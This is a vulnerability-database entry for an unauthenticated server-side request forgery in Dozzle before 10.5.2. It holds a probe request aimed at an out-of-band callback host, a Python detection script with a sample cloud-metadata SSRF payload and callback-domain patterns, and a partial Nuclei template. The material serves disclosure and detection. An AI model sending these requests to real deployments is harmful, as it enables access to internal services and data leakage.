CVE-2026-45298
Published 2026-05-26
Priority: P2 · 65 · Severity: high · CVSS 3.1 base score: 8.6
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Exploit: available
EPSS: 1.49% (70.9th percentile)
Dozzle is a realtime log viewer for docker containers. Prior to 10.5.2, in a default dozzle deploy (the documented quickstart, no DOZZLE_AUTH_PROVIDER set), POST /api/notifications/test-webhook is reachable without authentication and forwards an attacker-controlled URL into a WebhookDispatcher that sends an HTTP POST to the supplied URL with attacker-controlled request headers, and returns the response status code AND up to 1MB of the response body to the caller, when the target replies non-2xx. This vulnerability is fixed in 10.5.2.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| amir20 | dozzle | < 10.5.2 | 10.5.2 |
| amirraminfar | dozzle | < 10.5.2 | 10.5.2 |
| github.com | amir20_dozzle | 0 – 8.14.12 | — |
Detection & IOCs (extracted from sources)

Probe request:

```http
POST /api/notifications/test-webhook HTTP/1.1
Content-Type: application/json

{"url":"http://{{interactsh-url}}","headers":{}}
```
- The vulnerable endpoint POST /api/notifications/test-webhook is unauthenticated in default Dozzle deployments (no DOZZLE_AUTH_PROVIDER set). Monitor for unexpected POST requests to this path from external/untrusted sources.
- The SSRF payload is delivered as a JSON body with a 'url' key and optional 'headers' key. Inspect POST bodies to /api/notifications/test-webhook for attacker-controlled URLs pointing to internal resources or out-of-band callback hosts.
- On non-2xx responses from the target, the server returns up to 1MB of the response body to the caller — monitor for large response bodies from this endpoint as a sign of active SSRF data exfiltration.
- Nuclei template matches on HTTP interaction protocol hit on interactsh and response body containing '"statusCode":200' with HTTP 200 status — use these as detection signals in proxy/WAF logs.
- The vulnerability only affects default Dozzle deployments where DOZZLE_AUTH_PROVIDER is not configured. Deployments with an auth provider set may not expose the endpoint unauthenticated.
- The fix is present in Dozzle version 10.5.2 and later. Versions prior to 10.5.2 are affected.
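One way to turn the detection guidance above into a check, as an added example that is not from the advisory, the Nuclei template or the Dozzle project: it runs over constructed proxy/WAF log records (the field names client/method/path/body/response_bytes, the 4 KB alert threshold and the callback-domain list are assumptions) and reports which of the signals listed above each request triggers.

```python
import ipaddress
import json
from urllib.parse import urlparse

TARGET_PATH = "/api/notifications/test-webhook"
OOB_SUFFIXES = ("interact.sh", "oast.fun")  # interactsh callback domains (partial list, assumption)
LARGE_BODY = 4096  # endpoint relays up to 1MB of the target's reply; alert threshold is an assumption

def is_internal(host: str) -> bool:
    """Loopback, RFC1918, link-local (cloud metadata) or *.internal style hosts."""
    if host in ("localhost", "metadata.google.internal") or host.endswith((".internal", ".local")):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified

def classify(record: dict) -> list[str]:
    """Return the signals one request record triggers; [] means not relevant to this CVE."""
    if record.get("method") != "POST" or record.get("path") != TARGET_PATH:
        return []
    signals = ["test-webhook-post"]  # any hit on the path is worth reviewing
    try:
        body = json.loads(record.get("body") or "{}")
    except json.JSONDecodeError:
        return signals + ["unparseable-body"]
    url = body.get("url", "") if isinstance(body, dict) else ""
    host = (urlparse(str(url)).hostname or "").lower()
    if is_internal(host):
        signals.append("ssrf-internal-target")
    if host.endswith(OOB_SUFFIXES):
        signals.append("oob-callback-target")
    if isinstance(body, dict) and body.get("headers"):
        signals.append("attacker-supplied-headers")
    if record.get("response_bytes", 0) > LARGE_BODY:
        signals.append("large-response-relay")  # possible relay of the target's reply to the caller
    return signals

def scan(records: list[dict]) -> list[tuple[str, list[str]]]:  # flagged records keyed by client
    return [(r["client"], s) for r in records if (s := classify(r))]

# Constructed sample records, not real traffic.
SAMPLE_LOG = [
    {"client": "10.0.0.5", "method": "GET", "path": "/api/logs", "status": 200, "response_bytes": 812},
    {"client": "203.0.113.9", "method": "POST", "path": TARGET_PATH, "status": 200, "response_bytes": 65536,
     "body": '{"url":"http://169.254.169.254/latest/meta-data/","headers":{}}'},
    {"client": "203.0.113.9", "method": "POST", "path": TARGET_PATH, "status": 200, "response_bytes": 90,
     "body": '{"url":"http://abc123.oast.fun","headers":{"X-Probe":"1"}}'},
]
```

Running scan(SAMPLE_LOG) flags the two POSTs from 203.0.113.9 and leaves the ordinary log read alone.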
No detection rules found.
Nuclei
CVE-2026-45298 [HIGH] Dozzle - Server Side Request Forgery (CVSS 8.6)
Template:

```yaml
id: CVE-2026-45298
info:
  name: Dozzle - Server Side Request Forgery
  author: theamanrawat
  severity: high
  description: |
    Dozzle prior to 10.5.2 contains a server-side request forgery caused by unauthenticated access to POST /api/notifications/test-webhook forwarding attacker-controlled URLs, letting remote attackers send arbitrary HTTP POST requests and receive response data, exploit requires no authentication.
  impact: |
    Remote attackers can send arbitr
```
No writeups or analysis indexed.